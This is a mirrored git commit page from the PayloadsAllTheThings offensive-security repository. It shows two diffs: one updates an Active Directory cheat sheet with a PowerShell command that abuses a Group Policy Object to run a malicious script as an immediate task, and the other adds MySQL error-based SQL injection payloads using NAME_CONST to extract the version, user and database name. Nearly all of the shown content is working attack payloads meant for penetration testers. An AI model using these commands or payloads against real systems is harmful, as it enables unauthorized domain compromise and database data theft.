mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-13 23:02:46 +00:00
Merge branch 'master' of https://github.com/swisskyrepo/PayloadsAllTheThings
This commit is contained in:
commit
27768783ff
2 changed files with 11 additions and 2 deletions
|
@ -1056,7 +1056,7 @@ PS> Add-UserRights -Rights "SeLoadDriverPrivilege","SeDebugPrivilege" -Identity
|
||||||
PS> Add-ComputerScript/Add-UserScript -ScriptName 'EvilScript' -ScriptContent $(Get-Content evil.ps1) -GPOIdentity 'SuperSecureGPO'
|
PS> Add-ComputerScript/Add-UserScript -ScriptName 'EvilScript' -ScriptContent $(Get-Content evil.ps1) -GPOIdentity 'SuperSecureGPO'
|
||||||
|
|
||||||
# Create an immediate task
|
# Create an immediate task
|
||||||
PS> Add-UserTask/Add-ComputerTask -TaskName 'eviltask' -Command 'powershell.exe /c' -CommandArguments "'$(Get-Content evil.ps1)'" -Author Administrator
|
PS> Add-GPOImmediateTask -TaskName 'eviltask' -Command 'powershell.exe /c' -CommandArguments "'$(Get-Content evil.ps1)'" -Author Administrator -Scope Computer/User -GPOIdentity 'SuperSecureGPO'
|
||||||
```
|
```
|
||||||
|
|
||||||
#### Abuse GPO with pyGPOAbuse
|
#### Abuse GPO with pyGPOAbuse
|
||||||
|
@ -3399,4 +3399,3 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae
|
||||||
* [Web endpoints - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/ad-cs/web-endpoints)
|
* [Web endpoints - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/ad-cs/web-endpoints)
|
||||||
* [sAMAccountName spoofing - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/kerberos/samaccountname-spoofing)
|
* [sAMAccountName spoofing - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/kerberos/samaccountname-spoofing)
|
||||||
* [CVE-2021-42287/CVE-2021-42278 Weaponisation - @exploitph](https://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.html)
|
* [CVE-2021-42287/CVE-2021-42278 Weaponisation - @exploitph](https://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.html)
|
||||||
* [WebDAV, NTLM & Responder - Didier Stevens - Monday 20 May 2019](https://blog.didierstevens.com/2019/05/20/webdav-ntlm-responder/)
|
|
|
@ -220,6 +220,16 @@ Works with `MySQL >= 5.1`
|
||||||
?id=1 AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126)) FROM data_table.data_column LIMIT data_offset,1)))--
|
?id=1 AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126)) FROM data_table.data_column LIMIT data_offset,1)))--
|
||||||
```
|
```
|
||||||
|
|
||||||
|
### MYSQL Error Based - NAME_CONST function (only for constants)
|
||||||
|
|
||||||
|
Works with `MySQL >= 5.0`
|
||||||
|
|
||||||
|
```sql
|
||||||
|
?id=1 AND (SELECT * FROM (SELECT NAME_CONST(version(),1),NAME_CONST(version(),1)) as x)--
|
||||||
|
?id=1 AND (SELECT * FROM (SELECT NAME_CONST(user(),1),NAME_CONST(user(),1)) as x)--
|
||||||
|
?id=1 AND (SELECT * FROM (SELECT NAME_CONST(database(),1),NAME_CONST(database(),1)) as x)--
|
||||||
|
```
|
||||||
|
|
||||||
## MYSQL Blind
|
## MYSQL Blind
|
||||||
|
|
||||||
### MYSQL Blind with substring equivalent
|
### MYSQL Blind with substring equivalent
|
||||||
|
|
Loading…
Reference in a new issue